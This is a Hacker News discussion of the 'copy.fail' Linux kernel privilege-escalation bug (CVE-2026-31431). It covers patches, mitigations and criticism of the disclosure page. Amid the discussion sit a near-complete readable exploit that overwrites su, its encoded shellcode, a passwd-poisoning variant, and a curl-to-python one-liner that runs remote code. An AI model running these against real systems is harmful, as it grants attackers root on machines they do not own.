Here's the diff if you wanna play in your source (Gentoo, looking at you):<p><a href="https://github.com/torvalds/linux/commit/a664bf3d603d" rel="nofollow">https://github.com/torvalds/linux/commit/a664bf3d603d</a><p>6.18.25-gentoo-x86_64 has the patch for Gentoo.
distros might also apply patches to their own packages, so this isn't a perfect signal (i.e. if you have one of those versions, you almost certainly have the fix, but if you don't, it might still be fixed but you'll need to check the distro's package information to know for sure).
Major OS vendors will publish pages with the fixed versions:<p><a href="https://security-tracker.debian.org/tracker/CVE-2026-31431" rel="nofollow">https://security-tracker.debian.org/tracker/CVE-2026-31431</a><p><a href="https://ubuntu.com/security/CVE-2026-31431" rel="nofollow">https://ubuntu.com/security/CVE-2026-31431</a><p>Also, disabling algif_aead is suggested as a mitigation.
Note that in kubernetes, setting `allowPrivilegeEscalation` to false (which you should be doing already, it's in the Pod Security Standards Restricted profile) mitigates this.
according to this reddit post <a href="https://www.reddit.com/r/kubernetes/comments/1szn6p1/comment/oj4cs67/" rel="nofollow">https://www.reddit.com/r/kubernetes/comments/1szn6p1/comment...</a>?<p>> the primary mitigation is still patching the node kernel; user namespaces are blast-radius reduction, not a complete mitigation for this path
They have a setting for that?<p>That's crazy; it feels like prompting "make no mistakes" to the LLM.<p>If it works, when would you ever want it turned on? Why isn't false the default?
Because it would break all setuid binaries? Same reason the Linux kernel doesn't set no_new_privs (<a href="https://docs.kernel.org/userspace-api/no_new_privs.html" rel="nofollow">https://docs.kernel.org/userspace-api/no_new_privs.html</a>) by default.<p>As an operator you are responsible for configuring your environment correctly. I would recommend starting here: <a href="https://kubernetes.io/docs/concepts/security/" rel="nofollow">https://kubernetes.io/docs/concepts/security/</a>
It's equivalent to setting no_new_privs on the container process, so it'd mean you have to grant a privilege to the container process if you want any children to have access to it. It sure sounds funny in a CVE context, though.
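For context, `allowPrivilegeEscalation: false` boils down to setting that flag via prctl(2). A minimal Linux-only sketch using ctypes (constant values taken from &lt;linux/prctl.h&gt;; not part of the PoC):<p>

```python
import ctypes

# no_new_privs: once set, execve() of setuid binaries (such as the
# patched `su` this exploit relies on) no longer grants extra privileges.
PR_SET_NO_NEW_PRIVS = 38  # from <linux/prctl.h>
PR_GET_NO_NEW_PRIVS = 39

libc = ctypes.CDLL(None, use_errno=True)

# Set the flag for this process; it is irreversible and inherited by children.
assert libc.prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == 0

# Reading it back: the syscall returns the current flag value.
print(libc.prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0))  # prints 1
```

That irreversibility is exactly why it can't be the default: any workload that legitimately needs sudo/su/pkexec in a child process would silently break.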
As soon as I read this<p>>Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. any user becomes root<p>I jumped out of bed and went straight into webminal.org servers as a local user and ran the Python code. It says permission denied on the socket() call.<p>Then I tested on my local laptop:<p><pre><code>$ uname -a
Linux debian 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64 GNU/Linux
$ python3 copy_fail_exp.py
# cd /root && ls
bluetooth_fix_log.txt  dead.letter  overcommit_memorx~  overcommit_memory~  overcommit_memorz~  resize.txt  snap
</code></pre><p>It does provide root access!
Beware that running this kind of thing even as a test on a host you don't own may well be a criminal offense!
Everything MAY be a criminal offense. Whether it has any merit is another matter.<p>If I were accused of anything criminal for running this in a host, my defense would be that I was checking the safety of a service I was being offered. If the service was vulnerable, I would counterclaim, if you are on the defense you are already losing.
Could be worse (we'll see) as this could be a wild ride along with react2shell or some of the compromised packages as of late.
Anyone tried in an Azure Cloud Shell?<p>Asking for a friend ;)<p>EDIT: Don't. "/s" in case not obvious.
I also tested this on an Ubuntu 24.04 (x86_64) host w/ GA kernel ("6.8.0-103-generic #103-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 10 13:34:59 UTC 2026 x86_64 GNU/Linux") and wasn't able to reproduce the "problem", although `canonical-livepatch` tells me that there are currently "no livepatches available".
Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice
The Go version came in handy <a href="https://github.com/badsectorlabs/copyfail-go" rel="nofollow">https://github.com/badsectorlabs/copyfail-go</a> especially for systems without the very latest Python (os.splice requires 3.10+).<p>Slightly more readable Python version at <a href="https://gist.github.com/grenkoca/b82281a4706e936072979acf54b608df" rel="nofollow">https://gist.github.com/grenkoca/b82281a4706e936072979acf54b...</a>
The binary "zip" isn't the exploit, it's the shellcode. The exploit is the rest, which changes the code of a SUID executable (su).
I have a C translation here that should be pretty readable <a href="https://github.com/tgies/copy-fail-c" rel="nofollow">https://github.com/tgies/copy-fail-c</a>
The call to zlib basically decompresses a minimal ELF that gets written over a portion of the `su` binary, which execve's /bin/sh.
To be specific, the zlib'd binary basically does this (except that it directly uses Linux syscalls rather than C wrappers):<p><pre><code> setuid(0);
execve("/bin/sh", NULL, NULL);
exit(0);</code></pre>
Interestingly it fails for me because my `su` isn't world-readable:<p><pre><code> $ stat /bin/su
File: /bin/su
Size: 59552 Blocks: 118 IO Block: 59904 regular file
Device: 0,52 Inode: 796854 Links: 1
Access: (4711/-rws--x--x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2023-09-18 13:23:03.117105665 -0500
Modify: 2021-02-13 05:15:56.000000000 -0600
Change: 2023-09-18 13:23:03.119105665 -0500
Birth: 2023-09-18 13:23:03.117105665 -0500
</code></pre>
I'm not sure I have any setuid/setgid binaries that are world-readable...
A workaround might be to make all setuid/setgid files non-world-readable because then they cannot be opened at all, and thus there is no setuid file to replace the contents of.
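That combination is easy to audit for. A quick sketch in Python (a hypothetical helper, not from the PoC — it just checks the two mode bits the PoC depends on, since it must open() the target for reading):<p>

```python
import os
import stat

def setuid_world_readable(path):
    """True if the file is setuid/setgid AND world-readable --
    the combination this PoC needs on its target binary."""
    st = os.stat(path)
    is_suid = bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))
    is_world_readable = bool(st.st_mode & stat.S_IROTH)
    return is_suid and is_world_readable
```

Walking /usr/bin and /usr/sbin with this would list the candidate targets on a given box — though as noted downthread, any root-owned file you can read (shared libraries, cron scripts) extends the attack surface beyond setuid binaries.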
Eh, if you can pollute page caches this won’t save you.<p>Think modifying shared libraries, LD_PRELOAD targets, cron jobs, and on some systems even /etc/passwd.<p>There are a lot of readable files that should definitely not be writable.
Fair enough -- a simpler change might be to poison /etc/passwd and call `su` to a user that has uid 0, since that requires no shell code nor a readable binary, and this seems to have worked in a slightly modified POC:<p><pre><code> f=g.open("/etc/passwd",0);
e="rkeene:x:0:0:System administrator:/root:/run/current-system/sw/bin/bash\n".encode()
...
g.system("/run/wrappers/bin/su - rkeene")</code></pre>
It being readable is the default configuration most places, after all the purpose is to call it from a non-privileged user. But I could see it being made non-readable since its use is discouraged nowadays... though then I'd expect sudo to be readable as an alternative.
For this crowd, I highly suggest checking out the technical writeup<p><a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a>
This looks like an extraordinary find at first glance.<p>Does this mean you can go from a basic web shell from a shared hosting account to root? I can see how that could wreak havoc really quickly.
That’s the most AI-written page ever made
I've (well, mostly Claude did) created a module that unloads the active AF_ALG (builtin) module and mitigates the exploit without having to reboot.<p>Tested on almalinux8/9<p><a href="https://gist.github.com/42wim/2e3cc3c92333e4c2730541e6f0e03862" rel="nofollow">https://gist.github.com/42wim/2e3cc3c92333e4c2730541e6f0e038...</a><p>YMMV
What is "RHEL 14.3"? Was this site a one-shot prompt? Quality.
I couldn't get the POC to work with my version of Python so I had ChatGPT convert it to C [0] and was able to verify my Slackware system does not appear to be affected, but my NixOS system would be if I had any world-readable suid binaries (which I had to make one to test it).<p>[0] <a href="https://rkeene.org/viewer/tmp/copy_fail_exp.c.htm" rel="nofollow">https://rkeene.org/viewer/tmp/copy_fail_exp.c.htm</a>
If this is verified, this is a very big deal. Root access on any shared computer. Additionally do we know what kernel versions and stable versions have the patch?
I just tested on my home server running ubuntu 24.04 LTS with newest kernel from repositories, got root.
As far as mainline goes, only 7.0 and up have the patch already.
Debian page: <a href="https://security-tracker.debian.org/tracker/CVE-2026-31431" rel="nofollow">https://security-tracker.debian.org/tracker/CVE-2026-31431</a>
Oddly, the POC doesn't work on my Debian 12 (Bookworm) EC2 instance. Everything that should indicate it's vulnerable is there, including the ability to socket(38,5,0).bind("aead", "authencesn(hmac(sha256),cbc(aes))")
This is amazing. Page says it works on RHEL 14.3, which doesn’t exist. Current RHEL is 10.x, this must’ve been done in a TARDIS.
14.3 seems to come from some Red Hat-specific GCC version, which can be reported as "gcc (GCC) 14.3.1 20250617 (Red Hat 14.3.1-2)". See these random examples I found by googling:<p><a href="https://github.com/anthropics/claude-code/issues/40741" rel="nofollow">https://github.com/anthropics/claude-code/issues/40741</a> (gcc version "Red Hat 14.3" included in system version at the bottom)<p><a href="https://docs.oracle.com/en/database/oracle/tuxedo/22/otxig/software-requirements-red-hat-enterprise-linux-10-64-bit.html" rel="nofollow">https://docs.oracle.com/en/database/oracle/tuxedo/22/otxig/s...</a>
On the same line it says kernel version 6.12.0-124.45.1.el10_1. Which is RHEL 10. This is the kind of typo that humans make -- the hard to type numbers are accurate because they're cut and pasted, but the "easy" numbers have errors because they're not cut and pasted.
ugh sorry should be fixed. There was some scrambling to get more info together to explain the issue (and yes, obviously marketing), so there are some minor mistakes. Thanks for pointing it out!
Hope the 'marketing' had the desired effect. This entire article of pure AI noise was an absolute slog to get through to get to useful information. I have no idea how you view that as positive advertising.
> obviously marketing<p>Why marketing though?
because we're a company and we want to make money to continue to fund cool research, and help our customers secure their software :)
I don't quibble with your wanting to make money, but you also need to invest some resources on fact-checking, proofreading, and editing your work. You can hire technical writers and marketing copy editors on an hourly basis as needed. LLMs aren't good enough yet to produce high-quality output on their own; and the results tend to read similarly, loaded with clichés and identical turns of phrase.<p>(You're not alone in this, BTW; I don't mean to single you out.)
Resume-driven development
yeah, I assumed the whole thing was AI slop when I saw EL14...
<a href="https://x.com/i/status/2049687923814281351" rel="nofollow">https://x.com/i/status/2049687923814281351</a><p>> and yes, RHEL 14.3 doesn't exist We meant to say RHEL 10.1. Sorry for the confusion!
[flagged]
<p><pre><code> curl https://copy.fail/exp | python3 && su
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
AttributeError: module 'os' has no attribute 'splice'
</code></pre>
Does this mean I'm not affected, or is it a buggy script?<p>Edit: python3 is Python 3.6 on my system. Running with python3.10 instantly roots. Crazy find!
It is trivial to re-write splice; just because the PoC uses it does not mean you're "not affected".
What is your Python version? Splice was added in 3.10.<p><a href="https://docs.python.org/3/library/os.html#os.splice" rel="nofollow">https://docs.python.org/3/library/os.html#os.splice</a>
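As a sketch of what that fallback could look like on older Pythons (Linux-only, assuming the libc exposes a splice(2) wrapper; this is not part of the PoC):<p>

```python
import ctypes
import os

libc = ctypes.CDLL(None, use_errno=True)

def splice(fd_in, fd_out, count, offset_src=None):
    """Minimal stand-in for os.splice() on Python < 3.10.

    Mirrors splice(2): moves up to `count` bytes between fd_in and
    fd_out, at least one of which must be a pipe. `offset_src`, if
    given, is the read offset into fd_in (which must then be seekable).
    """
    off = ctypes.byref(ctypes.c_longlong(offset_src)) if offset_src is not None else None
    n = libc.splice(fd_in, off, fd_out, None, count, 0)
    if n < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
    return n
```

With something like this, the PoC's two os.splice() calls could presumably be swapped for the wrapper with the same arguments, though I haven't verified that end to end.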
Could this be used to root Android devices? Does Android ship with algif_aead?
I rewrote it quickly in C [1] (and changed the embedded binary to be aarch64).<p>Unfortunately it fails on calling bind() on my device, so probably Android doesn't ship that kernel module by default :(. So no freedom for my $40 phone.<p>Putting it out here, maybe somebody else will have better luck.<p>[1] <a href="https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb080fe" rel="nofollow">https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...</a>
I’ve poked around on my phone and it didn’t work:<p><pre><code> File "/data/data/com.termux/files/home/a.py", line 5, in c
a=s.socket(38,5,0); # ...
File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied</code></pre>
I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user-accessible setuid binary for it to work.<p><pre><code>Traceback (most recent call last):
  File "/data/data/com.termux/files/home/exploit.py", line 8, in &lt;module&gt;
    f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
    ^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'</code></pre>
There’s SELinux, everything is mounted nosuid, barely anything runs as root except init. I doubt it.
Android is smarter than setuid + system partitions aren't writable.
System partitions being non-writable has nothing to do with the vulnerability - it allows modifying the cache of any file that you can open for reading.<p>Not using setuid anywhere means you'd have to build a slightly more clever exploit, but it's still trivial - just modify some binary you know will run as root "soon".<p>But... I didn't check, but IIRC the untrusted_app secontext that apps run in is not allowed to open AF_ALG sockets - so you can't directly trigger the vulnerability as a malicious app. Although it might be possible in some roundabout way (requesting some more privileged crypto service to do so).
Edit: Ignore this, I overlooked the calling order. It is indeed blocked<p>~~My allegedly fully patched Pixel 8 Pro allowed an AF_ALG socket to open under Termux without virtualization, so I'm not sure the last bit is true~~
Ah, I blindly assumed such memory would be mapped readonly...
It's not writing to the partition though, is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.
Tried this on my arch VPS which has a few users that hasn't been rebooted for 122 days.<p>Got:<p><pre><code> OSError: [Errno 97] Address family not supported by protocol
</code></pre>
I guess AF_ALG is not part of the Arch Linux LTS kernel?<p>Edit:<p>Looks like on Arch you have to go out of your way to have this enabled.<p><pre><code> $ zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
CONFIG_CRYPTO_USER_API=m
CONFIG_CRYPTO_USER_API_HASH=m
CONFIG_CRYPTO_USER_API_SKCIPHER=m
CONFIG_CRYPTO_USER_API_RNG=m
# CONFIG_CRYPTO_USER_API_RNG_CAVP is not set
CONFIG_CRYPTO_USER_API_AEAD=m
# CONFIG_CRYPTO_USER_API_ENABLE_OBSOLETE is not set
$ uname -r
6.12.63-1-lts</code></pre>
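A quick way to check any box without running the exploit is to probe whether the socket can even be created (a sketch, not the exploit; 38 is AF_ALG on Linux, and Python's socket module has supported it since 3.6):<p>

```python
import socket

def af_alg_aead_reachable(algo="authencesn(hmac(sha256),cbc(aes))"):
    """Probe whether the kernel exposes the AF_ALG AEAD interface and
    can load the given algorithm. Returns (bool, detail string)."""
    AF_ALG = 38  # Linux-only address family
    try:
        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError as e:
        return False, f"AF_ALG socket unavailable: {e}"
    try:
        # AF_ALG bind convention: a (type, algorithm-name) tuple
        s.bind(("aead", algo))
        return True, "authencesn AEAD reachable"
    except OSError as e:
        return False, f"algorithm not loadable: {e}"
    finally:
        s.close()

print(af_alg_aead_reachable()[1])
```

Note that "reachable" only means the attack surface is exposed — a patched kernel still passes this probe, so it tells you whether disabling AF_ALG worked, not whether you're vulnerable.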
The Python dependency is easily eliminated, and the x86_64 payload made cross-platform: <a href="https://github.com/tgies/copy-fail-c" rel="nofollow">https://github.com/tgies/copy-fail-c</a>
The fetishization of "byte count" (here, the "732 byte python script") needs to stop, especially in a context like this where they're trying to illustrate a real failure mode.<p>Looking at their source code [1] it starts with this simple line:<p>import os as g,zlib,socket as s<p>And already I'm perplexed. "os as g"? But we're not aliasing "zlib as z"? Clearly this was auto-generated by some kind of minimizer, likely because zlib is called only once and os multiple times. As a code author/reviewer, I would never write "os as g", and I would absolutely never approve review of any code that used it.<p>Anyway, I could go on. :) Let's just stop fetishizing byte count.<p>[1] <a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py" rel="nofollow">https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...</a>
Hilariously, "os as g" adds one more byte than it saves, since os is only used 4 times but the alias takes 5 extra bytes to save 4. And "socket as s" comes out even.<p>If you wanted real savings, you'd use "d=bytes.fromhex" instead of defining a function -- 17 bytes!! And d('00') -> b'\0' for -2 bytes.<p>We could easily get the byte count down further by using base64.b85decode instead of bytes.fromhex (-70 or so), but ultimately we're optimizing a meaningless metric, as you mention.
I don't get the 732-byte thing either, and while I think it's a relatively punchy and unusually informative landing page for a named vulnerability, there are little snags like this all over it.<p>But the fact that it's not a kernel-exec LPE and it's reliable across kernels and distributions is important; it's close to the maximum "exploitability" you're going to see with an LPE. Which the page does communicate effectively; it just gilds the lily.
yeah... definitely a bit of a rush to get the landing page out after a long time in the disclosure process. The folks putting this all together have been working like mad (finding the bug, disclosing, working a lot on patching, writing up POCs and verifying exploitability in different scenarios) and stayed up really late to finish up the landing page, which led to a lot of minor issues.<p>But the bug is real and people should patch :)<p>For the size: sometimes people will shove in kilobytes of offset tables or something into an exploit, so it'll fingerprint and then look up details to work. This is much smaller because it doesn't need any of that, which is important for severity. (I agree the "golf" nature is a bit of an aside, kind of like pwn2own exploits taking "10 seconds")
I don't see it as fetishizing byte count. I think of it as a proxy measure for how complicated or uncomplicated the exploit might be. They could just as well have said "we can do it in 3 lines of python" or "the Shannon entropy of the script implementing the exploit is really small" and I would have interpreted it similarly.<p>Where do you see this "fetishizing" happening most often? It's a strange thing to counter-fetishize about.
> I think of it as a proxy measure for how complicated or uncomplicated the exploit might be.<p>From a Busy Beaver, 256-bytes compo, or Dwitter perspective, 732 bytes isn’t really that meaningful.<p>And the sample exploit is even optimizing the byte size by using zlib compression, which doesn’t make much sense for the purpose. It just emphasizes the byte count fetishization.
Again, I think the point is that compressed size is a reasonable measure of the inherent complexity of a program. I'm a crap mathematician, but I believe that is a fundamental concept in information theory.
Glad I’m not alone. The whiplash from “oh, python, I can read this” to “what the hell does that do” was jarring.<p>Assuming the AI was correct, it unpacks more or less like this:<p><pre><code>import os, zlib, socket

AF_ALG = 38
SOCK_SEQPACKET = 5
SOL_ALG = 279

def hex_bytes(x):
    return bytes.fromhex(x)

def trigger(fd, offset, patch4):
    sock = socket.socket(AF_ALG, SOCK_SEQPACKET, 0)
    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    sock.setsockopt(SOL_ALG, 1, hex_bytes("0800010000000010" + "0" * 64))
    sock.setsockopt(SOL_ALG, 5, None, 4)
    op, _ = sock.accept()
    length = offset + 4
    zero = b"\x00"
    op.sendmsg(
        [b"A" * 4 + patch4],
        [
            (SOL_ALG, 3, zero * 4),
            (SOL_ALG, 2, b"\x10" + zero * 19),
            (SOL_ALG, 4, b"\x08" + zero * 3),
        ],
        32768,
    )
    read_pipe, write_pipe = os.pipe()
    os.splice(fd, write_pipe, length, offset_src=0)
    os.splice(read_pipe, op.fileno(), length)
    try:
        op.recv(8 + offset)
    except:
        pass

target = os.open("/usr/bin/su", os.O_RDONLY)
payload = zlib.decompress(bytes.fromhex("..."))
offset = 0
while offset < len(payload):
    trigger(target, offset, payload[offset:offset + 4])
    offset += 4

os.system("su")</code></pre>
llms <i>love</i> that though<p>"The honest solution: a clean 50-line cut" and so on, ad nauseam
I started to take the exploit script apart and reformat it to be something readable. At about 1041 bytes it's actually readable. The heart of it also includes an encoded zlib compressed blob that's 180 bytes long ('78daab77...'). This is decompressed (zlib.decompress(d(BLOB)) to a 160 byte ELF header.
> I would absolutely never approve review of any code that used this.<p>How often do you review, and subsequently block the release, of PoCs in this sort of context? Sounds like you've faced this a lot.<p>I always thought code quality mattered less in those, as long as you communicate the intent.
If you have a choice between posting minimized exploit code, and posting regular exploit code, posting minimized code is virtually always the wrong choice.<p>If you have a choice between pointing out the byte size of the exploit, and not pointing out the byte size of the exploit, pointing it out is virtually always the wrong choice.<p>In both cases, doing the right thing is <i>less work</i>. So somebody is going the extra way to ensure they are doing it wrong. If they didn't care, they'd end up doing it right by default.
> as long as you communicate the intent<p>How does "import os as g" communicate the intent? How does hiding the payload behind zlib communicate the intent? This is the opposite: obfuscating the intent, so they can brag about 732 bytes instead of 846 bytes (or whatever it might have been).<p>It would have been less work for everyone involved to just release the unminified source.
While not formally reviewing code like this, I read a lot of it for fun. When it's clear and understandable, it's more educational and enjoyable. If the PoC code can also serve as a means of communication, that seems like an extra win.
While I agree that it doesn't make much sense to use a minimizer on code the reader could understand, the code-golfed byte count of a CVE repro communicates its complexity in a certain visceral way.
It's just lazy AI* writing w/o editing.<p>"Just" is doing a lot of work there; I'm so annoyed reading it.<p>It's like an anti-ad, and they had pretty cool material to work with.<p>* Claude loves staccato "Some numeric figure. Something else. Intensifier" (e.g. the "exploitable for a decade." sentences)
Completely without editing, to the point of hallucinating a RHEL version (14.3) that doesn't exist.
I recommend reading the technical writeup
<a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a>
This is pretty legible compared to the 90s C rootshell.org exploits.
> Anyway, I could go on.<p>Then go on. zlib is only used once, so "zlib as z" in exchange for using z once doesn't get you anything. Using os directly and not renaming it g saves you 2 bytes though. But in this age where AI outputs reams of code at the drop of a hat, why shouldn't we enjoy how small you can get it to pop a root shell?<p><a href="https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe1c94f" rel="nofollow">https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe...</a><p>edit: If we drop offset_src=0 and just pass in 0 positionally, it comes down to 720.
><i>As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.</i><p>lucky for them, its an exploit script, not enterprise code.<p>all that needs to be "reviewed" is whether or not it exploits the thing its supposed to.<p>edit: yall really think a 10-line proof of concept script needs to undergo a code review? wild. i shouldnt be surprised that the top comment on a cool LPE exploit is complaining about variable naming
It's just sloppy. Readers are human, and little mistakes like this take away from the article. Then you add a nonexistent RHEL version, and it just isn't a good look. Which is a shame, because it's otherwise a very interesting vuln.<p>Maybe you didn't care, but the length of this comment chain clearly shows that it matters. Effective communication is just as important as the engineering.
agreed regarding the RHEL version!<p>i just don't understand huffing and puffing over <i>"os as g"</i> in a 10-line poc script, and saying <i>"well i would never approve this"</i>. it's not enterprise code. it's not code that will ever be used anywhere else, for anything. its sole purpose is to prove that the exploit is real, which it does!<p>the rest of the information is in the actual vulnerability report. the poc is a courtesy to the recipient, so that they can confirm that the report itself isn't bullshit.<p>evidently, given the downvotes i am getting, people think exploit scripts should be enterprise-quality code. ¯\_(ツ)_/¯ half of the reports i see flowing through mailing lists don't even have a poc.<p>amazingly HN-like to be upset about a variable name
Disagree because to run the PoC you really ought to understand what it’s doing.<p>And this code is not readable at all. It is failing at letting people confirm the exploit easily.
><i>Disagree because to run the PoC you really ought to understand what it’s doing.</i><p>that is contained in the report, which will look similar to the blog. the maintainers will have an open line of contact with the reporters as well. the poc is a small part of the entire report. its not like the linux maintainers <i>only</i> received this poc and have to work out the vulnerability from it alone.<p>><i>It is failing at letting people confirm the exploit easily.</i><p>it confirms the exploit incredibly easily: just run it, and you get confirmation.
I don't think anyone is saying it's not "enterprise"; it's just that they clearly went out of their way to make it less readable. By all means advertise the golfed line count, but just include the non-minified script too.
I'd imagine that at minimum, the team in charge of patching the vulnerability would need to review how the exploit works.
What is the rationale behind naming CVEs and registering individual domains for them? Marketing?
It's an advertisement for their tool that found the exploit: <a href="https://copy.fail/#contact" rel="nofollow">https://copy.fail/#contact</a>, <a href="https://xint.io/products/xint-code" rel="nofollow">https://xint.io/products/xint-code</a>
can you remember what CVE-2021-44228 is without looking it up? CVE-2014-6271? CVE-2017-5753?<p>i bet if i told you their names, you would instantly know what vulns those are.<p>it's easier to talk about things with names. it hurts no one. it takes approximately no effort or time.<p>CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.
> CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.<p>What, you guys talk about books based on their “title” instead of just memorising the ISBN of each book? Pssh, count me disappointed!
For anyone else that was curious they're log4j, shellshock, and spectre
The AI generated prose screams marketing. Marketing is why there's a "Contact our Security Team" form at the bottom of the page.
It's certainly marketing, but it's prosocial: there's no scarcity of names, and "copy.fail" is much easier to remember and talk about than "CVE-2026-31431".
Probably to some extent it is marketing, but generally it has to do with getting the message out about significant bug finds to the people who need to apply patches and/or be informed. Heartbleed, Log4Shell, etc.<p>Very few CVEs get names dedicated to them like this, because when they do, it is usually very serious, as in this case.
Giving catchy names to bad exploits has been a thing for a while, probably to make them easy to reference and to make it easy to check whether you're patched, as opposed to passing numbers around. Heartbleed, Shellshock, BEAST, Goto Fail, etc.
Yes, originally it was to help spread awareness. Now it has become more of a gimmick I would say
It makes sure people don't forget about the vulnerabilities, at least
Same reason they name storms: numbers scare normies
Anyone have any idea when Bottlerocket will acknowledge the CVE? Seems critical for Kubernetes nodes...<p><a href="https://github.com/bottlerocket-os/bottlerocket/security/advisories" rel="nofollow">https://github.com/bottlerocket-os/bottlerocket/security/adv...</a>
> Any setuid-root binary readable by the user works.<p>Interesting detail. On Alpine, `/usr/bin/su` is not readable by any user, so the PoC doesn't work.<p>I suspect that the underlying issue can be exploited in other ways, but it makes me think that there's no reason for <i>any</i> suid binary to be world-readable.
For agents, if you are concerned about this, block access to "su", as it is interactive anyway. Not loading it into memory blocks the attack. If you are using AgentSH (<a href="https://www.agentsh.org" rel="nofollow">https://www.agentsh.org</a>) you can add a rule to block "su", and you will soon be able to block AF_ALG sockets if you want to protect things further.
Does this affect my Hetzner VPSs running Ubuntu? Or Nebius H200 VMs?<p>They are probably on Ubuntu 24, but I don't remember.
Quickly dove into this.<p>1. Yes, it's real.<p>2. Current chain can write any arbitrary content to any user-readable file (into the page cache).<p>3. Current chain relies on an available target suid binary that you can open() as a lowpriv user.<p>4. Current exploit relies on that binary being /bin/su and then being able to execve(/bin/sh, 0, 0) (which doesn't work on alpine, etc.). The former is easily replaced in the code. The latter needs a rebuilt payload ELF (also easy).<p>5. The authors say they have other chains (including ones that allow container escapes). I believe them.<p>6. A mildly de-minified PoC for Alpine with a new payload ELF is at hackerspace[pl]/~q3k/alpine.py . You'll need /bin/ping from iputils. This should be now somewhat reliable on any distro that has a `/bin/sh` and any setuid-and-readable binary (you'll just need to find it on your own).
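Point 3 ("find it on your own") is easy to check on any box. Here's a small sketch that lists setuid-root binaries an unprivileged user can also open for reading; the directory list is an assumption, so adjust it per distro:

```python
import os
import stat

def readable_setuid_root(dirs=("/usr/bin", "/bin", "/usr/sbin", "/sbin")):
    """Return setuid-root regular files that the current user can read."""
    hits = set()
    for d in dirs:
        try:
            names = os.listdir(d)
        except OSError:
            continue  # directory missing or unreadable
        for name in names:
            path = os.path.join(d, name)
            try:
                st = os.stat(path)
            except OSError:
                continue  # dangling symlink, race, etc.
            if (stat.S_ISREG(st.st_mode)
                    and st.st_mode & stat.S_ISUID
                    and st.st_uid == 0
                    and os.access(path, os.R_OK)):
                hits.add(os.path.realpath(path))
    return sorted(hits)

if __name__ == "__main__":
    for p in readable_setuid_root():
        print(p)
```

On Alpine, Gentoo, or NixOS this should come back (nearly) empty, which is why the stock PoC's `/usr/bin/su` target fails there.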
And yeah, you can just change arbitrary instructions of any running process (including privileged) as long as you have read access to that process' binary:<p><a href="https://object.ceph-waw3.hswaw.net/mastodon-prod/media_attachments/files/116/490/539/301/682/066/original/0e25f6b7b79cf80f.png" rel="nofollow">https://object.ceph-waw3.hswaw.net/mastodon-prod/media_attac...</a>
holy smokes, it just rooted my freshly-installed-from-ISO Ubuntu server
Better explanation of the write up (still from original exploit author) : <a href="https://xint.io/blog/copy-fail-linux-distributions" rel="nofollow">https://xint.io/blog/copy-fail-linux-distributions</a>
I wonder if this is a problem for very old honeypots like the one on the Turris Omnia, sold many years ago.
Docker wasn't a thing back then and everything was done with LXC containers, if at all.
Looks like an LLM hallucination: there is no such thing as "RHEL 14.3", although the referenced kernel signature (6.12.0-124.45.1.el10_1) does point to a real RHEL release, i.e. 10.1.
It looks like this is legit, but the script is very fishy and I wouldn't run it outside virtualized or disposable systems.<p><a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py" rel="nofollow">https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...</a><p>>zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))<p>This is not source code, this is binary; it's entirely possible that it contains a script that downloads another malicious script (or simply contains the malicious commands).<p>That said, I understand why a terser script might have been prioritized.<p>EDIT: There are a couple of C ports in the comments that contain more details and no compressed payloads.
> This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)<p>It doesn't, it's just a compressed ELF file that does setuid(0); execve(/bin/sh, 0, 0). You can just unzlib it and throw it in a disassembler.
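That kind of sanity check is easy to script before trusting a blob. A sketch, using a made-up demo payload rather than the real one from the PoC:

```python
import binascii
import zlib

def classify_blob(hex_blob):
    """Decompress a hex-encoded zlib blob and report a rough type + size."""
    raw = zlib.decompress(binascii.unhexlify(hex_blob))
    kind = "ELF binary" if raw[:4] == b"\x7fELF" else "something else"
    return kind, len(raw)

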